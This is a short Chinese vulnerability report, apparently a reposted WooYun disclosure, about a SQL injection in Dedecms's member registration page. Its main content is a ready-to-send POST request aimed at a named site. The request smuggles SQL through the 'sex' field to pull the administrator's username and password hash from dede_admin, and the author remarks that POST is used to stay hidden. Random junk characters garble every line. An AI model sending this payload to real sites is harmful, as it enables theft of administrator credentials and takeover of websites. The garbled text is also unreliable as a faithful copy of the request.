漏洞类型: SQL注射漏洞
3 z: m5 B8 N! R1 W) s简要描述:
) B+ `% \! [+ l% c" z. I \0 ? p) C2 A
- k- ^5 o2 w8 G' U需要magic_quotes_gpc=Off,应该是没有什么大危害的漏洞.1 ~! r0 u( @" o9 \
原来在wooyun发过一个Dedecms注射漏洞,貌似并没有修补,重新利用了一下,可以获得管理员密码./ O. E$ p7 A8 E# {# H
详细说明:跟这个漏洞' a0 D8 h9 ]8 y" O
2 Q7 I9 n1 L1 {# c! aWooYun: Dedecms SQL注射导致审核机制绕过漏洞
, v; U/ {6 L) Y$ ^是一个漏洞.其实不仅仅是审核机制绕过,可以获得管理员密码的.8 I& `- B% {/ S
POST提交以下数据,其实不用POST提交的,这样隐蔽点.
% y8 @: ]7 u" @$ y/ ` ; t1 N) c" ~! P/ O/ p1 _6 Z" y! S
www.political-security.com/member/reg_new.php
5 N. s0 f8 ]' q2 O3 a
3 v2 S; G/ O. ]5 Q* Y6 A$ f: fPOST
) D: m( f+ a. ?! j4 M' j* U2 I2 a/ n1 l
- B4 a3 i, q! X$ _2 idopost=regbase&step=1&mtype=%E4%B8%AA%E4%BA%BA&mtype=%E4%B8%AA%E4%BA%BA&
- m0 u" m/ R: @" e/ p/ @userid=c4rp3nt3r&uname=c4rp3nt3r( E6 T3 D( J! q; D- v' Z- K
&userpwd=ssssss&userpwdok=ssssss&email=sss%40ss.ss4 U; h3 L7 [: t C
&safequestion=0&safeanswer=&sex=boy',100,100,'sss@xx.xx',1000,0,'www' and @`'`,) U K* @, A- L! p( ?
(select concat(userid,0x3a,pwd) from `dede_admin` limit 1),0,'',1316751900,'',1316751900,'');& G: y: q3 I' s
%00&vdcode=glos&agree= |